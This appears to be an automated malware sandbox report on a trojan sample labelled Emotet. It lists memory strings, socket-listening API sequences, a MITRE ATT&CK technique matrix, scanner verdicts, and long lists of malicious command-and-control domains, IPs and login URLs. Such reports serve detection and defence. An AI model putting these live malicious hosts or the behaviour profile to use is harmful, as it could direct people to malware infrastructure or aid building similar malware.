Source: NcYLgtXIKJgHj.exe, 00000016.00000002.2606518078.00000000005E0000.00000040.00000001.00020000.00000000.sdmp	String found in binary or memory: RFB 003.006
Source: NcYLgtXIKJgHj.exe, 00000016.00000002.2606518078.00000000005E0000.00000040.00000001.00020000.00000000.sdmp	String found in binary or memory: $BRFB 003.006
Source: NcYLgtXIKJgHj.exe, 00000016.00000002.2610943205.0000000002340000.00000040.00000001.00020000.00000000.sdmp	String found in binary or memory: RFB 003.006
Source: NcYLgtXIKJgHj.exe, 00000016.00000002.2610943205.0000000002340000.00000040.00000001.00020000.00000000.sdmp	String found in binary or memory: $BRFB 003.006
Source: NcYLgtXIKJgHj.exe, 00000019.00000002.2629072397.0000000002B90000.00000040.00000001.00020000.00000000.sdmp	String found in binary or memory: RFB 003.006
Source: NcYLgtXIKJgHj.exe, 00000019.00000002.2629072397.0000000002B90000.00000040.00000001.00020000.00000000.sdmp	String found in binary or memory: $BRFB 003.006
Source: NcYLgtXIKJgHj.exe, 00000019.00000002.2643934604.0000000002F50000.00000040.00000001.00020000.00000000.sdmp	String found in binary or memory: RFB 003.006
Source: NcYLgtXIKJgHj.exe, 00000019.00000002.2643934604.0000000002F50000.00000040.00000001.00020000.00000000.sdmp	String found in binary or memory: $BRFB 003.006
Source: NcYLgtXIKJgHj.exe, 0000001C.00000002.2632299607.0000000002D10000.00000040.00000001.00020000.00000000.sdmp	String found in binary or memory: RFB 003.006
Source: NcYLgtXIKJgHj.exe, 0000001C.00000002.2632299607.0000000002D10000.00000040.00000001.00020000.00000000.sdmp	String found in binary or memory: $BRFB 003.006
Source: NcYLgtXIKJgHj.exe, 0000001C.00000002.2632514116.0000000002EB0000.00000040.00000001.00020000.00000000.sdmp	String found in binary or memory: RFB 003.006
Source: NcYLgtXIKJgHj.exe, 0000001C.00000002.2632514116.0000000002EB0000.00000040.00000001.00020000.00000000.sdmp	String found in binary or memory: $BRFB 003.006
Source: NcYLgtXIKJgHj.exe, 0000001F.00000002.2699028400.0000000002790000.00000040.00000001.00020000.00000000.sdmp	String found in binary or memory: RFB 003.006
Source: NcYLgtXIKJgHj.exe, 0000001F.00000002.2699028400.0000000002790000.00000040.00000001.00020000.00000000.sdmp	String found in binary or memory: $BRFB 003.006
Source: NcYLgtXIKJgHj.exe, 0000001F.00000002.2699100650.00000000027F0000.00000040.00000001.00020000.00000000.sdmp	String found in binary or memory: RFB 003.006
Source: NcYLgtXIKJgHj.exe, 0000001F.00000002.2699100650.00000000027F0000.00000040.00000001.00020000.00000000.sdmp	String found in binary or memory: $BRFB 003.006
Source: NcYLgtXIKJgHj.exe, 00000022.00000002.2697002323.0000000002740000.00000040.00000001.00020000.00000000.sdmp	String found in binary or memory: RFB 003.006
Source: NcYLgtXIKJgHj.exe, 00000022.00000002.2697002323.0000000002740000.00000040.00000001.00020000.00000000.sdmp	String found in binary or memory: $BRFB 003.006
Source: NcYLgtXIKJgHj.exe, 00000022.00000002.2695460193.0000000000BD0000.00000040.00000001.00020000.00000000.sdmp	String found in binary or memory: RFB 003.006
Source: NcYLgtXIKJgHj.exe, 00000022.00000002.2695460193.0000000000BD0000.00000040.00000001.00020000.00000000.sdmp	String found in binary or memory: $BRFB 003.006
Source: NcYLgtXIKJgHj.exe, 00000024.00000002.2645314223.00000000023A0000.00000040.00000001.00020000.00000000.sdmp	String found in binary or memory: RFB 003.006
Source: NcYLgtXIKJgHj.exe, 00000024.00000002.2645314223.00000000023A0000.00000040.00000001.00020000.00000000.sdmp	String found in binary or memory: $BRFB 003.006
Source: NcYLgtXIKJgHj.exe, 00000024.00000002.2645122457.0000000002200000.00000040.00000001.00020000.00000000.sdmp	String found in binary or memory: RFB 003.006
Source: NcYLgtXIKJgHj.exe, 00000024.00000002.2645122457.0000000002200000.00000040.00000001.00020000.00000000.sdmp	String found in binary or memory: $BRFB 003.006

Source: C:\Windows\apppatch\svchost.exe	Code function: 2_2_02C888F0 WSAStartup,ExitThread,socket,ExitThread,htons,htons,htons,bind,ExitThread,listen,ExitThread,gethostname,gethostbyname,inet_ntoa,accept,accept,getpeername,inet_ntoa,htons,CreateThread,CloseHandle,accept,ExitThread,closesocket,ExitThread,	2_2_02C888F0
Source: C:\Windows\apppatch\svchost.exe	Code function: 2_2_02C9E6D0 setsockopt,htons,socket,setsockopt,bind,	2_2_02C9E6D0
Source: C:\Windows\apppatch\svchost.exe	Code function: 2_2_02C9F4A0 htons,socket,setsockopt,closesocket,bind,listen,	2_2_02C9F4A0
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Code function: 6_2_017588F0 WSAStartup,ExitThread,socket,ExitThread,htons,htons,htons,bind,ExitThread,listen,ExitThread,gethostname,gethostbyname,inet_ntoa,accept,accept,getpeername,inet_ntoa,htons,CreateThread,CloseHandle,accept,ExitThread,closesocket,ExitThread,	6_2_017588F0
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Code function: 6_2_0176F4A0 htons,socket,setsockopt,closesocket,bind,listen,	6_2_0176F4A0
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Code function: 6_2_0176E6D0 setsockopt,htons,socket,setsockopt,bind,	6_2_0176E6D0
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Code function: 7_2_031188F0 WSAStartup,ExitThread,socket,ExitThread,htons,htons,htons,bind,ExitThread,listen,ExitThread,gethostname,gethostbyname,inet_ntoa,accept,accept,getpeername,inet_ntoa,htons,CreateThread,CloseHandle,accept,ExitThread,closesocket,ExitThread,	7_2_031188F0
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Code function: 7_2_0312E6D0 setsockopt,htons,socket,setsockopt,bind,	7_2_0312E6D0
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Code function: 7_2_0312F4A0 htons,socket,setsockopt,closesocket,bind,listen,	7_2_0312F4A0
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Code function: 10_2_015388F0 WSAStartup,ExitThread,socket,ExitThread,htons,htons,htons,bind,ExitThread,listen,ExitThread,gethostname,gethostbyname,inet_ntoa,accept,accept,getpeername,inet_ntoa,htons,CreateThread,CloseHandle,accept,ExitThread,closesocket,ExitThread,	10_2_015388F0
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Code function: 10_2_0154F4A0 htons,socket,setsockopt,closesocket,bind,listen,	10_2_0154F4A0
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Code function: 10_2_0154E6D0 setsockopt,htons,socket,setsockopt,bind,	10_2_0154E6D0

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	1 Valid Accounts	22 Native API	1 DLL Side-Loading	1 Abuse Elevation Control Mechanism	1 Disable or Modify Tools	111 Input Capture	2 System Time Discovery	1 Remote Desktop Protocol	1 Archive Collected Data	4 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	2 Command and Scripting Interpreter	1 Create Account	1 DLL Side-Loading	1 Abuse Elevation Control Mechanism	LSASS Memory	11 Account Discovery	Remote Desktop Protocol	1 Screen Capture	11 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 Scheduled Task/Job	1 Valid Accounts	1 Valid Accounts	1 Obfuscated Files or Information	Security Account Manager	1 System Network Connections Discovery	SMB/Windows Admin Shares	111 Input Capture	11 Non-Standard Port	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	1 Scheduled Task/Job	1 Access Token Manipulation	31 Software Packing	NTDS	2 File and Directory Discovery	Distributed Component Object Model	2 Clipboard Data	1 Remote Access Software	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	1 Registry Run Keys / Startup Folder	613 Process Injection	1 DLL Side-Loading	LSA Secrets	143 System Information Discovery	SSH	Keylogging	3 Non-Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	1 Bootkit	1 Scheduled Task/Job	322 Masquerading	Cached Domain Credentials	1 Query Registry	VNC	GUI Input Capture	14 Application Layer Protocol	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	1 Registry Run Keys / Startup Folder	1 Valid Accounts	DCSync	351 Security Software Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 Access Token Manipulation	Proc Filesystem	151 Virtualization/Sandbox Evasion	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	151 Virtualization/Sandbox Evasion	/etc/passwd and /etc/shadow	13 Process Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	613 Process Injection	Network Sniffing	11 Application Window Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement
Network Security Appliances	Domains	Compromise Software Dependencies and Development Tools	AppleScript	Launchd	Launchd	1 Bootkit	Input Capture	1 System Owner/User Discovery	Software Deployment Tools	Remote Data Staging	Mail Protocols	Exfiltration Over Unencrypted Non-C2 Protocol	Firmware Corruption

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label
Bpfz752pYZ.exe	82%	ReversingLabs	Win32.Trojan.Emotet
Bpfz752pYZ.exe	100%	Avira	TR/Crypt.XPACK.Gen
Bpfz752pYZ.exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Label
http://puzylyp.com/login.php	100%	Avira URL Cloud	malware
http://vofybic.com/login.php	100%	Avira URL Cloud	malware
http://volyjym.com/login.php	100%	Avira URL Cloud	malware
http://lyryxen.com/login.php	100%	Avira URL Cloud	malware
http://vojyzyt.com/login.php	100%	Avira URL Cloud	malware
http://purymuq.com/login.php	100%	Avira URL Cloud	malware
http://lyxyvyn.com/login.php	100%	Avira URL Cloud	malware
http://vojyjyc.com/login.php	100%	Avira URL Cloud	phishing
http://www.google.comtor	0%	Avira URL Cloud	safe
http://vopycom.com/login.php	100%	Avira URL Cloud	malware
http://qexynyq.com/login.php	100%	Avira URL Cloud	malware
http://gadykos.com/login.php	100%	Avira URL Cloud	malware
http://qexyfuq.com/login.php	100%	Avira URL Cloud	malware
http://galyvuz.com/login.php	100%	Avira URL Cloud	malware
http://lyryman.com/login.php	100%	Avira URL Cloud	malware
http://vowyrif.com/login.php	100%	Avira URL Cloud	malware
http://lygyxun.com/login.php	100%	Avira URL Cloud	malware
http://ganyzub.com/login.php	100%	Avira URL Cloud	phishing
http://galydyw.com/	100%	Avira URL Cloud	malware
http://lyvysur.com/login.php	100%	Avira URL Cloud	malware
http://qekyhil.com/login.php	100%	Avira URL Cloud	malware
http://qexyvoq.com/login.php	100%	Avira URL Cloud	malware
http://galydyw.com/login.php	100%	Avira URL Cloud	malware
http://vofydac.com/login.php	100%	Avira URL Cloud	malware
http://qetyhyg.com/login.php	100%	Avira URL Cloud	phishing
http://qeqykyv.com/H	100%	Avira URL Cloud	malware
http://gahyvab.com/login.php	100%	Avira URL Cloud	malware
http://lymyner.com/login.php	100%	Avira URL Cloud	malware
http://ganyhus.com/H	100%	Avira URL Cloud	malware
http://lygytyd.com/login.php	100%	Avira URL Cloud	malware
http://pujyteq.com/login.php	100%	Avira URL Cloud	malware
http://pufytip.com/login.php	100%	Avira URL Cloud	malware
http://lysytoj.com/login.php	100%	Avira URL Cloud	malware
http://qetynev.com/login.php	0%	Avira URL Cloud	safe
http://gatykyh.com/login.php	100%	Avira URL Cloud	malware
http://qedyhyl.com/login.php	100%	Avira URL Cloud	malware
http://pupycuv.com/login.php	100%	Avira URL Cloud	malware
http://pujylog.com/login.php	100%	Avira URL Cloud	malware
http://qetyvil.com/login.php	100%	Avira URL Cloud	malware
http://gadyniw.com/login.php	100%	Avira URL Cloud	malware
http://lysynaj.com/login.php	100%	Avira URL Cloud	malware
http://vopygat.com/login.php	100%	Avira URL Cloud	phishing
http://puzytap.com/login.php	100%	Avira URL Cloud	malware
http://lyxygur.com/login.php	100%	Avira URL Cloud	malware
http://gaqyres.com/login.php	100%	Avira URL Cloud	malware
https://puzylyp.com/login.php	100%	Avira URL Cloud	malware
http://qeqyxyp.com/login.php	100%	Avira URL Cloud	malware
http://puzybil.com/login.php	0%	Avira URL Cloud	safe
http://lyvynid.com/login.php	100%	Avira URL Cloud	malware
http://106.15.232.163:8000/dh/147287063_134827.html#index8?d=lyrysor.com	0%	Avira URL Cloud	safe
http://qegyfyp.com/login.php	100%	Avira URL Cloud	malware
http://qeqykog.com/login.php	100%	Avira URL Cloud	phishing
http://lysyxar.com/login.php	100%	Avira URL Cloud	malware
http://lygyjuj.com/login.php	100%	Avira URL Cloud	malware
http://lyxygax.com/login.php	100%	Avira URL Cloud	malware
http://qedykiv.com/login.php	100%	Avira URL Cloud	malware
http://pumytup.com/login.php	100%	Avira URL Cloud	malware
http://qedyrag.com/login.php	100%	Avira URL Cloud	malware
http://puzylol.com/login.php	100%	Avira URL Cloud	phishing
http://puvydov.com/login.php	100%	Avira URL Cloud	malware
http://gahyqub.com/login.php	100%	Avira URL Cloud	malware
http://pupywog.com/login.php	100%	Avira URL Cloud	malware
http://pumyxiv.com/login.php	100%	Avira URL Cloud	malware
http://qedyruv.com/login.php	100%	Avira URL Cloud	malware
http://pufyxov.com/login.phpcom/login.php	100%	Avira URL Cloud	phishing
http://volycem.com/login.php	100%	Avira URL Cloud	malware
http://puzyduq.com/login.php	100%	Avira URL Cloud	malware
http://puzydal.com/login.php	100%	Avira URL Cloud	malware
http://galyqaz.com/login.php	100%	Avira URL Cloud	malware
http://lyxysad.com/login.php	100%	Avira URL Cloud	malware
http://gahyzez.com/login.php	100%	Avira URL Cloud	malware
http://vopymyc.com/login.php	100%	Avira URL Cloud	malware
http://puryxag.com/login.php	100%	Avira URL Cloud	malware
http://purywyl.com/login.php	100%	Avira URL Cloud	malware
http://vojycec.com/login.php	100%	Avira URL Cloud	malware
http://gatyfus.com/login.php	100%	Avira URL Cloud	malware
http://pufybyv.com/login.php	100%	Avira URL Cloud	malware
http://ganyfes.com/login.php	100%	Avira URL Cloud	malware
http://lyvyjox.com/login.php	100%	Avira URL Cloud	malware
http://qegytyv.com/login.php	100%	Avira URL Cloud	malware
http://volydot.com/login.php	100%	Avira URL Cloud	phishing
http://galyquw.com/login.php	100%	Avira URL Cloud	malware
http://lykyvod.com/login.php	100%	Avira URL Cloud	malware
http://pujydap.com/login.php	100%	Avira URL Cloud	malware
http://gadyneh.com/login.php	100%	Avira URL Cloud	malware
http://vocydyc.com/login.php	100%	Avira URL Cloud	malware
http://lysyvan.com/login.php	100%	Avira URL Cloud	malware
http://ganyvyw.com/login.php	100%	Avira URL Cloud	malware
http://lyvyxyj.com/login.php	100%	Avira URL Cloud	malware
http://lykywid.com/login.php	100%	Avira URL Cloud	malware
http://qexyhuv.com/login.php	100%	Avira URL Cloud	malware
http://qexylup.com/login.php	100%	Avira URL Cloud	malware
http://lymylij.com/login.php	0%	Avira URL Cloud	safe
http://pumybuq.com/login.php	0%	Avira URL Cloud	safe
http://pufymyg.com/login.php	100%	Avira URL Cloud	malware
http://pupyteg.com/login.php	100%	Avira URL Cloud	malware
http://qedyfog.com/login.php	100%	Avira URL Cloud	malware
http://vojybef.com/login.php	100%	Avira URL Cloud	malware
http://ganycuh.com/login.php	100%	Avira URL Cloud	malware
http://pufylul.com/login.php	100%	Avira URL Cloud	malware

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
pupydeq.com	13.248.169.48	true	true	unknown
pupycag.com	18.208.156.248	true	true	unknown
lyvyxor.com	208.100.26.245	true	true	unknown
77026.bodis.com	199.59.243.227	true	false	high
lysyvan.com	188.114.96.3	true	true	unknown
galynuh.com	64.225.91.73	true	true	unknown
parkingpage.namecheap.com	91.195.240.19	true	false	high
qegyhig.com	188.114.96.3	true	true	unknown
gatyfus.com	85.17.31.82	true	true	unknown
vonypom.com	18.208.156.248	true	true	unknown
puzylyp.com	99.83.170.3	true	true	unknown
qexyhuv.com	76.223.67.189	true	true	unknown
77980.bodis.com	199.59.243.227	true	false	high
pltraffic7.com	72.52.179.174	true	false	high
gadyciz.com	44.221.84.105	true	true	unknown
gadyniw.com	154.212.231.82	true	true	unknown
lyxynyx.com	103.224.212.210	true	true	unknown
www.sedoparking.com	64.190.63.136	true	false	high
lygyvuj.com	52.34.198.229	true	true	unknown
lygynud.com	3.94.10.34	true	true	unknown
gahyqah.com	23.253.46.64	true	true	unknown
vocyzit.com	44.221.84.105	true	true	unknown
galyqaz.com	199.191.50.83	true	true	unknown
vofycot.com	103.224.182.252	true	true	unknown
qetyhyg.com	64.225.91.73	true	true	unknown
gahyhiz.com	44.221.84.105	true	true	unknown
qetyfuv.com	44.221.84.105	true	true	unknown
gtm-sg-6l13ukk0m05.qu200.com	103.150.10.48	true	true	unknown
lymyxid.com	3.94.10.34	true	true	unknown
qegyval.com	154.85.183.50	true	true	unknown
gatyzoz.com	unknown	unknown	true	unknown
lykygaj.com	unknown	unknown	true	unknown
qedyxel.com	unknown	unknown	true	unknown
qedyqup.com	unknown	unknown	true	unknown
qekyluv.com	unknown	unknown	true	unknown
gatyrez.com	unknown	unknown	true	unknown
vofybic.com	unknown	unknown	true	unknown
pujydag.com	unknown	unknown	true	unknown
vojykom.com	unknown	unknown	true	unknown
qetysuq.com	unknown	unknown	true	unknown
vonyzut.com	unknown	unknown	true	unknown
pufyjuq.com	unknown	unknown	true	unknown
pujytug.com	unknown	unknown	true	unknown
galyhiw.com	unknown	unknown	true	unknown
lykygun.com	unknown	unknown	true	unknown
vopymyc.com	unknown	unknown	true	unknown
gatyfaz.com	unknown	unknown	true	unknown
vojycit.com	unknown	unknown	true	unknown
lyvymej.com	unknown	unknown	true	unknown
lygyvar.com	unknown	unknown	true	unknown
purygiv.com	unknown	unknown	true	unknown
gahykeb.com	unknown	unknown	true	unknown
purymog.com	unknown	unknown	true	unknown
gadyzib.com	unknown	unknown	true	unknown
ganyqow.com	unknown	unknown	true	unknown
lyxysun.com	unknown	unknown	true	unknown
puzyjyg.com	unknown	unknown	true	unknown
vopydek.com	unknown	unknown	true	unknown
qexyfuq.com	unknown	unknown	true	unknown
gatykyh.com	unknown	unknown	true	unknown
vocykem.com	unknown	unknown	true	unknown
gahynus.com	unknown	unknown	true	unknown
pumypop.com	unknown	unknown	true	unknown
lyvysur.com	unknown	unknown	true	unknown
puzypav.com	unknown	unknown	true	unknown
galypob.com	unknown	unknown	true	unknown
gacyqoz.com	unknown	unknown	true	unknown
lykywid.com	unknown	unknown	true	unknown
lykytin.com	unknown	unknown	true	unknown
vofyref.com	unknown	unknown	true	unknown
qekytig.com	unknown	unknown	true	unknown
vocyzek.com	unknown	unknown	true	unknown
puvypoq.com	unknown	unknown	true	unknown
puvybeg.com	unknown	unknown	true	unknown
pupydig.com	unknown	unknown	true	unknown
pupyguq.com	unknown	unknown	true	unknown
qedyqal.com	unknown	unknown	true	unknown
vowymom.com	unknown	unknown	true	unknown
purypol.com	unknown	unknown	true	unknown
ganypeb.com	unknown	unknown	true	unknown
vopymit.com	unknown	unknown	true	unknown
vowyguf.com	unknown	unknown	true	unknown
pupytiq.com	unknown	unknown	true	unknown
lymyfoj.com	unknown	unknown	true	unknown
vowyzuf.com	unknown	unknown	true	unknown
gatyruw.com	unknown	unknown	true	unknown
qebynyg.com	unknown	unknown	true	unknown
puzymev.com	unknown	unknown	true	unknown
pupymol.com	unknown	unknown	true	unknown
vojycif.com	unknown	unknown	true	unknown
qebyvyl.com	unknown	unknown	true	unknown
lymysan.com	unknown	unknown	true	unknown
qekynuq.com	unknown	unknown	true	unknown
puryjil.com	unknown	unknown	true	unknown
puvytuv.com	unknown	unknown	true	unknown
galyzus.com	unknown	unknown	true	unknown
gadyfuh.com	unknown	unknown	true	unknown
vofycyk.com	unknown	unknown	true	unknown
lyxywer.com	unknown	unknown	true	unknown
vojymuk.com	unknown	unknown	true	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://puzylyp.com/login.php	true	Avira URL Cloud: malware	unknown
http://galyqaz.com/login.php	true	Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://volyjym.com/login.php	svchost.exe, 00000002.00000003.2588418708.00000000087AB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2334498126.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2592000281.00000000086F4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2334047161.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2337179930.00000000086F9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2332145984.00000000086F1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2332778027.00000000086FE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2333419776.00000000086FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2334800958.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2610879120.00000000033D8000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://purymuq.com/login.php	svchost.exe, 00000002.00000003.2301052009.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2303334009.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2553968961.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2552314103.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2558551911.0000000000882000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2300434955.00000000086F1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2557483842.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2303458885.0000000008682000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2558367053.00000000033D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2307697997.0000000003394000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2307211585.0000000008682000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2556984027.00000000086F6000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://vopycom.com/login.php	svchost.exe, 00000002.00000003.2194039895.000000000865C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2432573037.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2503287920.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3344516796.00000000008A3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2502622128.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3393093066.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3388007673.0000000000884000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3347214715.00000000008FA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3404121983.00000000087A4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3404003407.0000000008783000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2513112023.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3341799100.00000000087A4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2202332641.00000000033D9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2432700162.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2194197284.0000000008691000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://vofybic.com/login.php	svchost.exe, 00000002.00000003.2588418708.00000000087AB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2334498126.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2334047161.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2337179930.00000000086F9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2332145984.00000000086F1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2593211279.00000000087FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2332778027.00000000086FE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2333419776.00000000086FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2334800958.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2610879120.00000000033D8000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://vojyzyt.com/login.php	svchost.exe, 00000002.00000003.2301052009.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2303334009.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2553968961.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2552314103.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2300434955.00000000086F1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2557483842.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2307697997.0000000003394000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2556984027.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2301364243.00000000033D8000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://lyryxen.com/login.php	svchost.exe, 00000002.00000003.2588418708.00000000087AB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2334498126.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2334047161.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2332552292.00000000033D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2337179930.00000000086F9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2332145984.00000000086F1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2337011719.0000000003394000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2334800958.00000000086F6000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
